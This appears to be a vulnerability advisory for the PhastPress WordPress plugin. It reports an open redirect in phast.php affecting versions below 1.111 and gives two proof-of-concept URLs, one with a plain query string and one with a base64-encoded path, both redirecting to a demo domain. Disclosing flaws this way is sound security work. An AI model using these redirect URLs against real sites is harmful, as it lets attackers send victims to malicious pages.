There is an open redirect in the plugin that allows an attacker to malform a request to a page with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only go to whitelisted pages but itβs possible to redirect the victim to any domain.
https://example.com/wp-content/plugins/phastpress/phast.php?service=scripts&src;=https%3A%2F%2Fwpscan.com https://example.com/wp-content/plugins/phastpress/phast.php/c2VydmljZT1pbWFnZXMmc3JjPWh0dHBzJTNBJTJGJTJGd3BzY2FuLmNvbSZjYWNoZU1hcmtlcj0mdG9rZW49.q.png c2VydmljZT1pbWFnZXMmc3JjPWh0dHBzJTNBJTJGJTJGd3BzY2FuLmNvbSZjYWNoZU1hcmtlcj0mdG9rZW49 being the base64 of service=images&src;=https%3A%2F%2Fwpscan.com&cacheMarker;=&token;=
CPE | Name | Operator | Version |
---|---|---|---|
phastpress | lt | 1.111 |